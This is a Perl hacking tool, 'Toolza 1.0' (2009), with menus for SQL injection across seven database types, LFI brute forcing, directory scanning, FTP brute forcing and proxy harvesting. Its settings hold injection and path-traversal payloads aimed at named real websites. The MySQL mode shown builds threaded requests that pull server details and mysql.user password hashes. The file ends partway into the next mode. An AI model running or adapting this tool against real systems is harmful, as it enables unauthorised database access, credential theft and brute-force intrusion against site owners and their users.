  1. #!/usr/bin/perl - UTF-8 encoding
  2. use threads;
  3. use threads::shared;
  4. use IO::Socket;
  5. #use IO::Socket::SSL; # For enable HTTPS support uncomment this line
# Variables shared between the worker threads the script creates later
# (threads::shared).  $num is advanced under lock() by the workers as the
# index into their list of requests; $ck1 receives the cookie string that
# collect() extracts from the HTTPS authorization response.  $good is
# declared here but not referenced anywhere in the visible part of the file.
my $num : shared;   # shared work-item index, incremented under lock()
my $good : shared;  # not used in this excerpt
my $ck1 : shared;   # cookies gathered from the HTTPS auth response
  9. ###########################################################################
  10. ## ?????????? ????????? ??? ???? ??????? | Global settings for all modes ##
  11. ###########################################################################
  12. $test_mode = 0;# when 1 - print get/post page content in terminal0
  13. $method = 0; # 1- Post; 0 - GET ????? ???????? | Post or Get method, 1-POST; 0-GET|||||SAFE POST - with $sql_post, line 27
  14. $get_method = 0; # 0 - via IO::Socket, 1 - via LWP::Simple -  if can't get DATA
  15. $use_proxy = 0; # 0 - ??? ??????; 1 - c ?????? | 1 -Use proxy; 0 - No proxy
  16. $proxy = "proxy.txt"; # ???? ? ???????? | Proxy file
  17. $use_socks = 0; # 0 - ??? socks; 1 - c socks | 1 -Use socks; 0 - No socks
  18. $socks_file = "socks.txt";# ???? ? SOCKS | SOCKS file (SOCKS4-5 supported, no authorization)
  19. $kol_threads = 10; # ???-?? ???????, ????????????? -10 | Number of threads - 10 recommended
  20. $timeout = 20; # ??????? ? ???????? | Timeout in seconds
  21. $cookie = 'PHPSESSID=qeqp01ccc006ra904qtaouoct0;b=b'; # ???? ??? ??? - ????????? "" | If no coockie set ""
  22. $https_mode_auth = 1; # 1 - whith authorization, 0 - no
  23. $https_auth_script_path = "/signin.php";
  24. $https_auth_post_data = "uname=qqq&passwd=123&Submit=Sign+In";
  25. $referer = "http://google.com"; # ???????, ???? ??? ????????? "" | If no referer set ""
  26. $user_agent = "Mozilla/5.0 (Windows NT 5.1; U; ru; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10"; # ???? ?????, ???? ??? ????????? "" | If no user agent set ""
  27. $sql_post = ""; # SQLi Post parameter
  28. #$sql_header = "Accept-Language: 1+and+1=1+or";# SQLi Header parametr (include COOKIE), if present before - comment it with "#"
  29. $http_protocol = 1; # 0 - HTTP/1.0; 1 - HTTP/1.1; Default - 1
  30. $pause = 0; # ????? ????? ????????? ? ???????? | Pause between requests in seconds
  31. #########################################################################################################################################
  32. ## ???????? ????????? MySQL - ?????? ?????????????? ???? ????????? " ^ " |MySql Basic options -  print " ^ " instead of printable field #
  33. #########################################################################################################################################
  34. $source_sql = "http://www.lebow.drexel.edu/Newsroom/Newsletters/index.php?cid=(1)and(0)union+select+1,2,3,^,5,6,7,8,9,10,11,12";
  35. $filtr = "--+"; # close SQL
  36. $plus = "+"; # /**/,%20,%2b & etc.
  37. $limit = 0; # 0 - no limit; 1 - limit+0,1; 2 - limit+1,1
  38. $unhex = 0; # unhex(hex(DATA))); 0 - disable; 1 - enable
  39. $aes = 0; # AES_DECRYPT(AES_ENCRYPT(DATA),x071),x071); 0 - disable; 1 - enable
  40. $aes_key = "0x71"; # AES key
  41. ######################################
  42. ## MySql4 brute # URL = $source_sql ##
  43. ######################################
  44. $source_table_list = "source_table_list.txt"; # ????-??????? ??? ????? ?????? ? MySql4
  45. $source_column_list = "source_column_list.txt"; # ????-??????? ??? ????? ??????? ? MySql4
  46. ######################################
  47. ## Site Scanner for folders & files ##
  48. ######################################
  49. $scan_url = "site.com"; # ??? ????? ? ?????
  50. $folder_list = "scaner_folder_list.txt"; # ????-??????? ??? ??????? ?????/??????
  51. $error_list = "scaner_errors_list.txt"; # ???? c ???????? ??????? ??????? ??? ???????????? ??????? ?????/?????
  52. ###################################
  53. ## LFI/READER/Load_file() bruter ##
  54. ##########################################################################################################
  55. # LFI/READER/Load_file, ?tc/passwd ???????? ?? " ^ " , ??? ? ? load_file('/etc/passwd') = load_file('/^')#
  56. # ??? ? load_file(0x2f6574632f706173737764) = load_file(^)                                               #
  57. ##########################################################################################################
  58. $lrl_url = "http://dominionpropertymanagement.com/index.php?option=com_propiedades&controller=../../../../../../../../../../../^%00";
  59. $lrl_error_message = "require_once"; # ??????? (????? ???????), ??????? ?????, ???? ?????? ???????????? ??????|Message when wrong
  60. $lrl_list = "logs.txt"; # ????-??????? ??? ??????? ?????/?????? | File with paths/files
  61. ################################################################################
  62. ## Blind SQL-injection ????????? - ??????? +and+mid(version(),1,1)=5--+ ##
  63. ################################################################################
  64. $bl_mode = 1; # mode of blind sql injection:
  65. #-----------------------------------------------------------------------------------------------------------------
  66. # mode 0 example - http://site.com/index.php?id=1+and+mid(version(),1,1)=5--+
  67. #in script:
  68. #$bl_url = "http://site.com/index.php?id=1";
  69. #$bl_filtr = "--+";
  70. #$bl_plus = "+";
  71. #$bl_error = "here_wrong_message";
  72. #$bl_error_type = 0;
  73. #-----------------------------------------------------------------------------------------------------------------
  74. # mode 1 example - http://site.com/index.php?id=1+and+1=if((select+mid(version(),1,1)=5),1,(select+1+union+select+2))
  75. #in script:
  76. #$bl_url = "http://site.com/index.php?id=1+and+1=if((select";
  77. #$bl_filtr = "),1,(select+1+union+select+2))";
  78. #$bl_plus = "+";
  79. #$bl_error = "here_wrong_message";
  80. #$bl_error_type = 0;
  81. #-----------------------------------------------------------------------------------------------------------------
  82. $bl_url = "http://www.flygo.ru/1'or"; # url
  83. $bl_filtr = "--'"; # close SQL
  84. $bl_plus = "+"; # /**/,%20,%2b & etc.
  85. $bl_error = '???????'; # ????? ????????????? ???????????/????????????? ??????? | Message when wrong/right query
  86. #$bl_error = 'height="45"'; # ????? ????????????? ???????????/????????????? ??????? | Message when wrong/right query
  87. $bl_error_type = 0; # ??? ?????? ??????????????, 1 - ????? ?????? ??????????, 0 - ????? ?????? ???????????? | Type of message: 1 - when right query, 0 - when wrong query
  88. $bl_your_query = ""; #example - concat_ws(0x3a,table_schema,table_name)
  89. $bl_from = "";#without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+like+0x7573657273
  90. ##################################################################################
  91. ## NAME_CONST Blind SQL-injection ????????? - ???????? version() ??? ???? ?? "^"##
  92. ##################################################################################
  93. $nc_url = "http://www.montserrat.edu/galleries/montserrat/index.php?id=(select+min(@:=1)from+(select+1+union+select+2)k+group+by+concat(^,0x3a,@:=@-1))--+^"; # url
  94. $nc_plus = "+"; # /**/,%20,%2b & etc.
  95. #############################################################
  96. ## ???????? ????????? MySQL injection column number bruter ##
  97. #############################################################
  98. $source_sql_c = "http://site.com/more.php?pid=4847+or+1=1";# url
  99. $filtr_c = "--+"; # close SQL
  100. $plus_c = "+"; # /**/,%20,%2b & etc.
  101. $sql_mess = "on line 28";# ????? ????????????? ???????????/????????????? ??????? | Message when wrong number of columns
  102. $sql_mess_type = 0;# ??? ?????? ??????????????, 1 - ????? ?????? ??????????, 0 - ????? ?????? ???????????? | Type of message: 1 - when right query, 0 - when wrong query
  103. $sql_max_column_number = 120; # Max column number for brute
  104. #############################################################################################
  105. ##            FTP checker                                                                  ##
  106. #############################################################################################
  107. $ftp_list = "ftp.txt"; # file with unchecked ftp
  108. $ftp_save = "ftp_good.txt"; # file with checked & good ftp
  109. $ftp_def_port = 21; # default ftp port
  110. #############################################################################################
  111. ##            FTP bruter                                                                   ##
  112. #############################################################################################
  113. $ftp_host = "ftp.example.com"; # ftp host
  114. $ftp_def_port_b = 21; # default ftp port
  115. $ftp_login = ""; # when know login, passwords brute
  116. $ftp_pass_file = "ftp_pass.txt"; # when know login, passwords brute
  117. $ftp_pass = ""; # when know password, logins brute
  118. $ftp_login_file = "ftp_login.txt"; # when know password, logins brute
  119. $ftp_login_pass_file = "ftp_login_pass.txt"; # login:password brute
  120. $ftp_login_pass_del = ":"; # login:password delimetr (:|; & etc)
  121. #############################################################################################
  122. ##            PROXY checker                                                                ##
  123. #############################################################################################
  124. $proxy_list = "proxy.txt"; # unchecked proxy file
  125. $proxy_save = "proxy_good.txt"; # checked & good proxy file
  126. #############################################################################################
  127. ##            PROXY grabber                                                                ##
  128. #############################################################################################
  129. $proxy_site_list = "proxy_site_list.txt"; # file with sites with free proxy
  130. #############################################################################################
  131. ##            MSSQL injection                                                              ##
  132. #############################################################################################
  133. $ms_url = "http://site.com/showSubcategories.aspx?categoryid=1%20or%201="; # url
  134. $ms_spase = "/**/"; #%20,%2b & etc.
  135. $ms_close = ""; #close SQL
  136. $ms_convert_in = 0; # 0 - don't use convert(int,(data)), 1 - use convert(int,(data))
  137. ######################################################################################################################
  138. ## PostgreSQL - ?????? ?????????????? ???? ????????? " ^ " | Basic options -  print " ^ " instead of printable field #
  139. ######################################################################################################################
  140. $p_union_select_url = "http://example.com/index.php?id=-5+null,^,null"; # url UNION+SELECT method
  141. $p_subquery_url = "http://example.com/index.php?id=-5"; # url SUBQUERY method
  142. $p_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method
  143. $p_filtr = "--+"; # close SQL
  144. $p_plus = "+"; # %20,%2b & etc.
  145. $p_convert = "text"; # convert data type(text,int ... etc.) - for subquery method
  146. #####################################################################################################
  147. ##          Sybase SQL                                                                             ##
  148. #####################################################################################################
  149. $s_union_select_url = "http://example.com/index.php?id=-1+union+select+null,^,null"; # url UNION+SELECT method
  150. $s_subquery_url = "http://example.com/index.php?id=-5"; # url SUBQUERY method
  151. $s_method = 0;# 0 - UNION+SELECT method, 1 - SUBQUERY method
  152. $s_filtr = "--+"; # close SQL
  153. $s_plus = "+"; # /**/,%20,%2b & etc.
  154. $s_convert = "numeric"; # default type to convert - numeric (for subquery method)
  155. #####################################################################################################
  156. ##          Ms Access & Jet SQL                                                                    ##
  157. #####################################################################################################
  158. $a_source_sql = "http://site.com/?l=news&o=display&page=&idx=317"; # url
  159. $a_filtr = ""; # close SQL
  160. $a_plus = "+"; # %20,%2b & etc.
  161. $a_error_code_column_more = "80040e14"; # method ORDER BY - error code when column number is MORE
  162. $a_error_code_table = "80040e37"; # error code when wrong table
  163. $a_error_code_column = "80040e10"; # error code when wrong column
  164. $a_max_column_number = 100; # max column number for brute
  165. #######################################################################################################################
  166. ## Oracle SQL - ?????? ?????????????? ???? ????????? " ^ " | Basic options -  print " ^ " instead of printable field ##
  167. #######################################################################################################################
  168. $o_source_sql = "http://example.com/index.php?id=-5+null,^,null"; # url
  169. $o_filtr = "--+"; # close SQL
  170. $o_plus = "+"; # %20,%2b & etc.
  171. $o_convert = "char"; # default type to convert printable field - char
  172. #######################################################################################################################
  173. ## Firebird/Interbase SQL##
  174. #######################################################################################################################
  175. $fi_source_sql = "http://example.com/image.php?operator=2)+and+1="; # url http://example.com/image.php?operator=2)+and+1=cast(user+as+char(777))--
  176. $fi_filtr = "--"; # close SQL
  177. $fi_plus = "+"; # %20,%2b & etc.
  178. $fi_convert = "char(777)"; # default data type - char(777)
  179. #####################################################################################################
  180. ## floor(rand()) MySQL## example: http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+ # Blind SQL inj alternative
  181. #######################################################################################################################
  182. $f_table = "information_schema.tables"; #  default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here
  183. $f_url = "http://www.montserrat.edu/galleries/montserrat/index.php?id=(1)or(select(1)from"; # url
  184. $f_plus = "+"; # %20,%2b & etc.
  185. $f_filtr = "--"; # close SQL
  186. #####################################################################################################
  187. ## ???? ?????? ?? ???????, ???? ?? ?????, ??? ?????? | Don't touch anything below if you don't know what you do ##
  188. ##################################################################################################################  #####################################################################################################
# The numeric $method switch from the settings section (1 = POST, 0 = GET)
# is rewritten into the HTTP verb string that the rest of the script
# compares against (e.g. $types eq "POST" inside req()).
if ($method == 1) {
     $method = "POST";
} else {
     $method = "GET";
}
# Used further down to replace every "+" with a space in $sql_header
# ($sql_header =~ s!\Q$search!$replacement!g); \Q makes the "+" literal.
$search="+";
$replacement=" ";
  196. sub collect {
  197.  my $datass = $_[0];
  198.  my $cookies = undef;
  199.  while($datass =~ /Set-Cookie: (.+?)(;|\r)/igs){
  200.    $cookies .= $1."; ";
  201.  }
  202.  return $cookies;
  203. }
sub req {
 # Send one request to $hosts:443 over TLS and return the raw response text.
 #
 # Arguments: ($hosts, $paths, $types, $datas, $cookiess) - host name,
 # request path, HTTP verb ("POST" gets a form-encoded body; anything else is
 # sent without a body), the POST body, and the value placed in the Cookie
 # header.  The only visible caller (the HTTPS authorization step) passes 0
 # as $cookiess, so that request carries a literal "Cookie: 0" line.
 # Returns: the response read until the server closes the connection, or
 # undef when nothing was read.
 #
 # NOTE(review): IO::Socket::SSL is only loaded if the commented "use" line
 # near the top of the file is uncommented; otherwise this call fails at
 # runtime.  Nothing here sets SSL_verify_mode (certificate checking depends
 # on the installed module's default) and the result of new() is never
 # checked, so a failed connection reaches the print below with an undefined
 # handle.
 my($hosts, $paths, $types, $datas, $cookiess) = @_;
 my $https_sock = IO::Socket::SSL->new("$hosts:443");
 # Header lines are terminated with bare "\n" rather than CRLF, and no
 # Connection: close header accompanies the HTTP/1.1 request line; the
 # read-until-EOF loop below therefore depends on the server closing.
 my $request = "$types $paths HTTP/1.1\n".
 "Host: $hosts\n".
 "Cookie: $cookiess\n";
 if($types eq "POST") {
     $request .= "Content-type: application/x-www-form-urlencoded\n".
     "Content-Length: ".length($datas)."\n\n".$datas;
 } else {
     $request .= "\n";
 }
 print $https_sock $request;
 my $answ = undef;
 # Accumulate everything until EOF; $answ stays undef if nothing arrives.
 while(my $buf = <$https_sock>) {
     $answ .= $buf;
 }
 return $answ;
}
  223. $socks_check = 0;
  224. $https_flag = 0;
  225. $https_auth_check = 0;
  226. $sql_data_flag = false;
  227. my ($CRLF,$port4,$login,$pass,$sock_res);
  228. $CRLF = "\015\012";
  229. ($lrl_start, $lrl_end) = split (/\^/, $lrl_url);
  230. $lrl_url =~ /^http:\/\/?([^\/]+)/i;
  231. $host2 = $1;
  232. $bl_url =~ /^http:\/\/?([^\/]+)/i;
  233. $host3 = $1;
  234. $lrl_url = $lrl_start . "[BRUTE]" . $lrl_end;
  235. $f_url =~ /^http:\/\/?([^\/]+)/i;
  236. $host13 = $1; # floor
  237. $scan_url =~ /^http:\/\/?([^\/]+)/i;
  238. $host1 = $1;
  239. $source_sql_c =~ /^http:\/\/?([^\/]+)/i;
  240. $host5 = $1;
  241. ($nc_start,$nc_midle,$nc_end) = split(/\^/,$nc_url);
  242. $nc_url =~ /^http:\/\/?([^\/]+)/i;
  243. $host6 = $1;
  244. #--- default paterns ----#
  245. $ms_pattern_sys_tab = "Syntax error converting the .* value \'(.*)\' to a column of data type"; # regular expression to parse sys & tables
  246. $ms_pattern_sys_tab1 = "Conversion failed when converting the .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  247. $ms_pattern_columns = "Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse columns from tables
  248. $ms_pattern_columns1 = "Conversion failed when converting .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  249. $ms_pattern_data1   = "Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse DATA from columns v.1
  250. $ms_pattern_data2   = "[SQL Server]Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse DATA from columns v.2
  251. $ms_pattern_data3 = "Conversion failed when converting .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  252. $ms_url =~ /^http:\/\/?([^\/]+)/i;
  253. $host7 = $1;
  254. if ($p_method == 0) {
  255.     ($p_sql_start, $p_sql_end) = split (/\^/, $p_union_select_url);
  256.     $p_union_select_url =~ /^http:\/\/?([^\/]+)/i;
  257.     $host8 = $1;
  258. }
  259. if ($p_method == 1) {
  260.     $p_subquery_url =~ /^http:\/\/?([^\/]+)/i;
  261.     $host8 = $1;
  262. }
  263. if ($s_method == 0) {
  264.     ($ss_sql_start, $ss_sql_end) = split (/\^/, $s_union_select_url);
  265.     $s_union_select_url =~ /^http:\/\/?([^\/]+)/i;
  266.     $host9 = $1;
  267. }
  268. if ($s_method == 1) {
  269.     $s_subquery_url =~ /^http:\/\/?([^\/]+)/i;
  270.     $host9 = $1;
  271. }
  272. $p_sql_pref1 = "chr(117)||chr(115)||chr(115)||chr(114)||"; # ?? ????????
  273. $p_sql_pref2 = "||chr(117)||chr(115)||chr(115)||chr(114)"; # ?? ????????
  274. $s_sql_pref1 = "0x75737372||"; # ?? ????????
  275. $s_sql_pref2 = "||0x75737372"; # ?? ????????
  276. $a_source_sql =~ /^http:\/\/?([^\/]+)/i;
  277. $host10 = $1;
  278. $a_sql_pref1 = "chr(94)%2b"; # ?? ????????
  279. $a_sql_pref2 = "%2bchr(94)"; # ?? ????????
  280. ($o_sql_start, $o_sql_end) = split (/\^/, $o_source_sql);
  281. $o_source_sql =~ /^http:\/\/?([^\/]+)/i;
  282. $host11 = $1;
  283. $o_sql_pref1 = "chr(117)||chr(115)||chr(115)||chr(114)||"; # ?? ????????
  284. $o_sql_pref2 = "||chr(117)||chr(115)||chr(115)||chr(114)"; # ?? ????????
  285. $fi_source_sql =~ /^http:\/\/?([^\/]+)/i;
  286. $host12 = $1;
  287. $fi_sql_pref1 = 'ascii_char(117)||ascii_char(115)||ascii_char(115)||ascii_char(114)||'; # ?? ????????
  288. $fi_sql_pref2 = '||ascii_char(117)||ascii_char(115)||ascii_char(115)||ascii_char(114)'; # ?? ????????
  289. print "-----------------------------------------\n";
  290. $sql_pref1 = "CONCAT(0x75737372,"; # ?? ????????
  291. $sql_pref2 = ",0x75737372)"; # ?? ????????
  292. if ($aes == 1) {
  293.      $sql_CP_start =  "AES_DECRYPT(AES_ENCRYPT(";
  294.      $sql_CP_end = "," . $aes_key . ")," . $aes_key . ")";
  295. }
  296. if ($unhex == 1) {
  297.      $sql_CP_start =  "UNHEX(HEX(";
  298.      $sql_CP_end = "))";
  299. }
  300. if (($aes == 0) && ($unhex == 0)) {
  301.      $sql_CP_start =  "";
  302.      $sql_CP_end = "";
  303. }
  304. if ($limit == 0) {
  305.      $limit =  "";
  306. }
  307. if ($limit == 1) {
  308.      $limit =  $plus . "limit" . $plus . "0,1";
  309. }
  310. if ($limit == 2) {
  311.      $limit =  $plus . "limit" . $plus . "1,1";
  312. }
  313. if ($use_proxy == 1) {
  314.    print "----------------------------------------\n";
  315.    print "You choose mode with proxy, try to find good in $proxy ...\n";
  316.    print "Timeout = $timeout sec:\n";
  317.    print "----------------------------------------\n";
  318.    $proxy_flag = 0;
  319.    open(FILE9, "<", $proxy);
  320.    while(<FILE9>) {
  321.          chomp;
  322.          push(@prox, $_);
  323.    }
  324.    close(FILE9);
  325.    $size = @prox;
  326.    $i = 0;
  327.    while ($i < $size) {
  328.       $current_proxy = $prox[$i];
  329.       ($current_proxy_host,$current_proxy_port) = split(/:/,$current_proxy);
  330.       if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
  331.            print "Will use --> $current_proxy_host:$current_proxy_port\n";
  332.            $proxy_flag = 1;
  333.            $proxy_message = "$current_proxy_host:$current_proxy_port";
  334.            $i = $size;
  335.       } else {
  336.            print "$current_proxy_host:$current_proxy_port - Bad proxy\n";
  337.       }
  338.       $i++;
  339.    }
  340.    if ($proxy_flag == 0) {
  341.         print "----------------------------------------\n";
  342.         print "No good proxy in " . $proxy . ", change mode. Exit...\n";
  343.         exit;
  344.    }
  345. } else {
  346.    $proxy_message = "no";
  347. }
  348. $flag_check = 0;
  349. print "-----------------------------------------\n";
  350. print "Toolza 1.0 by Pashkela [ BugTrack Team ] (c) 2009\n";
  351. START_global:
  352. if ($get_method == 1) {
  353.      print "------------------------------------------------------------------------------\n";
  354.      print "===================> Only GET-method, no proxy, no socks! <===================\n";
  355.      print "------------------------------------------------------------------------------\n";
  356. }
  357. print "----------------------------------------------------------\n";
  358. print "               Choose mode:\n";
  359. print "----------------------------------------------------------\n";
  360. print "    [1]  Mysql injection\n";
  361. print "    [2]  MSSQL injection\n";
  362. print "    [3]  PostgreSQL injection\n";
  363. print "    [4]  Sybase SQL injection\n";
  364. print "    [5]  Access & Jet SQL injection\n";
  365. print "    [6]  Oracle SQL injection\n";
  366. print "    [7]  Firebird/Interbase SQL injection\n";
  367. print "    =======================================================\n";
  368. print "    [8]  LFI/Reader/Load_file() bruter\n";
  369. print "    [9]  Scan site for folders & files\n";
  370. print "    [10] FTP checker\n";
  371. print "    [11] FTP bruter\n";
  372. print "    [12] Proxy checker\n";
  373. print "    [13] Proxy grabber\n";
  374. print "    =======================================================\n";
  375. print "    [14] Exit\n";
  376. print "----------------------------------------------------------\n";
  377. if($sql_post and !$sql_header){
  378.    $method = "POST";
  379.    $sql_flag = 1;  
  380.    print "SQLi in POST parameter...\n";
  381.   ($sql_start, $sql_end) = split (/\^/, $sql_post);
  382.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  383.    $host100 = $1; # source_sql host
  384. }elsif(!$sql_post and $sql_header){      
  385.    $sql_flag = 2;  
  386.    print "SQLi in HEADER parameter...\n";
  387.    $sql_header =~ s!\Q$search!$replacement!g;
  388.    ($sql_start, $sql_end) = split (/\^/, $sql_header);
  389.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  390.    $host100 = $1; # source_sql host
  391. }elsif($sql_post and $sql_header){
  392.    print "==========================================================================\n";
  393.    print "SQLi in HEADER parameter[\$sql_post] and in POST parametr[\$sql_header]\n";
  394.    print "in \"Global settings\" section - don't supported, choose one, exit...\n";
  395.    print "==========================================================================\n";
  396.    exit;          
  397. }else{
  398.    print "SQLi in GET parameter...\n";
  399.    $sql_flag = 0;  
  400.    ($sql_start, $sql_end) = split (/\^/, $source_sql);
  401.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  402.    $host100 = $1; # source_sql host
  403. }
  404. $choice = <STDIN>;
  405. chomp $choice;
  406. print "Your choice: $choice\n";
  407. ## Mysql ###############################################################################################################
  408. if ($choice == 1) {
  409. START:
  410. if ($source_sql =~ m/^https:\/\/?([^\/]+)/i) {
  411.    $host100 = $1;
  412.    $https_flag = 1;
  413.    print "----------------------\n";
  414.    print "HTTPS mode enabled\n";
  415.    print "----------------------\n";
  416. }
  417. $host = $host100;
  418. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  419.     print "-----------------------------------------\n";
  420.     print "Authorization required, wait please....";
  421.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  422.     $ck1 = collect($answ1);
  423.     $https_auth_check = 1;
  424.  
  425.     print " DONE\n";
  426.     print "-----------------------------------------\n";
  427. }
  428. sub ascii_to_hex($) {
  429.  
  430.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  431.                $str = "0x" . $str;
  432.              return $str;
  433.     }
  434. if ($use_socks == 1 && $socks_check == 0) {
  435.   $check_url = $host;
  436.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  437.            . "Host: $check_host\r\n"
  438.            . "Referer: http://" . $check_url . "\r\n"
  439.            . "Accept: */*\r\n"
  440.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  441.            . "Connection: close\r\n\r\n";
  442.    print "----------------------------------------\n";
  443.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  444.    print "Timeout = 5 sec:\n";
  445.    print "----------------------------------------\n";
  446.    $socks_check = 0;
  447.    $check_socks = socks_check();
  448.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  449.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  450.   if ($current_proxy_host) {
  451.      $socks_check = 1;
  452.      print "Will use --> $proxy_message\n";
  453.   } else {
  454.      $socks_check = 0;
  455.      $proxy_message = "No";
  456.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  457.   }
  458. }
  459. print "----------------------------------------------------------\n";
  460. print "               Choose mode:\n";
  461. print "----------------------------------------------------------\n";
  462. print "    [1]  Mysql inj system information\n";
  463. print "    [2]  Mysql inj get DB-names from information_schema.schemata\n";
  464. print "    [3]  Mysql inj get tables from DB-name\n";
  465. print "    [4]  Mysql inj get column_name from tables from DB-name\n";
  466. print "    [5]  Mysql inj get tables from information_schema (current DB)\n";
  467. print "    [6]  Mysql inj get column_name from table (current DB)\n";
  468. print "    [7]  Mysql inj get data from columns\n";
  469. print "    [8]  Mysql inj brute tables & columns\n";
  470. print "    [9]  Mysql inj column number bruter\n";
  471. print "    [10] Mysql inj Blind\n";
  472. print "    [11] Mysql inj NAME_CONST\n";
  473. print "    [12] Mysql inj floor(rand())\n";
  474. print "    [13] Mysql inj LOAD_FILE (file_priv = Y)\n";
  475. print "----------------------------------------------------------\n";
  476. print "    [14]  Main menu\n";
  477. print "----------------------------------------------------------\n";
  478. $choice = <STDIN>;
  479. chomp $choice;
  480. print "Your choice: $choice\n";
  481. if ($choice == 1) {
  482.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  483.      if ($flag_check == 0) {
  484.            $url0 = $sql_start . $sql_CP_start . "SQL" . $sql_CP_end . $sql_end . $limit . $filtr;
  485.            $flag_check = 1;
  486.            print "-----------------------------------------\n";
  487.            print "Check basic options:\n";
  488.            print "-------------------\n";
  489.            print "$url0\n";
  490.            print FILE "$url0\n";
  491.      }
  492.      #### ?????? ?????? #####################################################
  493.      $url1 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,version())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  494.      #### ?????? ??? ???? #####################################################
  495.      $url2 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  496.      #### ?????? ????? #####################################################
  497.      $url3 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x757365723a,user())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  498.      #### ?????? @@basedir #####################################################
  499.      $url4 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  500.      #### ?????? @@datadir #####################################################
  501.      $url5 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  502.      #### ?????? @@tmpdir #####################################################
  503.      $url6 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  504.      #### ?????? @@version_compile_os #####################################################
  505.      $url7 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  506.      #### ?????? mysql.user #####################################################
  507.      $url8 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "mysql.user" . $limit . $filtr;
  508.      #### ?????? mysql.password #####################################################
  509.      $url9 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "mysql.user" . $limit . $filtr;
  510.      #### ?????? file_priv #####################################################
  511.      $url10 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus ."from" . $plus . "mysql.user" . $plus . "where" . $plus . "user=user" . $limit . $filtr;
  512.      #####################################################################
  513.      $thr = $kol_threads; # ???-?? ???????
  514.      $num = -1; # ?? ????????
  515.      print "-----------------------------------------\n";
  516.      print "System information:\n";
  517.      print "-----------------------------------------\n";
  518.      print FILE  "-----------------------------------------\n";
  519.      print FILE  "HOST: $host\n";
  520.      print FILE "-----------------------------------------\n";
  521.      print FILE "System information:\n";
  522.      print FILE "-----------------------------------------\n";
  523.      print "Request method - $method\n";
  524.      print "Threads - $kol_threads\n";
  525.      print "Proxy - $proxy_message\n";
  526.      print "----------------------\n";
  527.      for(0..$thr) {
  528.         $trl[$_] = threads->create(\&gets1);
  529.      }
  530.      for(0..$thr) {
  531.         $trl[$_]->join;
  532.      }
  533.      sub gets1 {
  534.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
  535.         $size = @array; #???????? ?????? ???????
  536.         $| = 1;
  537.         while ($num<$size) {
  538.             { lock($num);
  539.             $num++; }
  540.             if($sql_flag == 0){
  541.               $current = $array[$num];
  542.               $content = scan_url();
  543.             } elsif ($sql_flag == 1) {#POST
  544.               $current = $source_sql;
  545.               $sql_post = $array[$num];
  546.               $content = scan_url_POST();
  547.             } elsif($sql_flag == 2){#HEADER
  548.               $current = $source_sql;
  549.               $sql_header_query = $array[$num];
  550.               $sql_header_query =~ s!\Q$search!$replacement!g;
  551.               $content = scan_url_HEADER();
  552.             }
  553.             if ($content =~ m/ussr(.*?)ussr/imgs) {
  554.                   print $1 . "\n";
  555.                   print FILE $1 . "\n";
  556.             }
  557.             print $num . "\r";
  558.             sleep $pause;
  559.         }
  560.      }
  561.      print "----------\n";
  562.      print "Saved in " . "z_" . $host . ".txt\n";
  563.      close(FILE);
  564.      goto START;
  565. }
  566. #### ??????? ?? ##################################################################################################
  567. if ($choice == 2) {
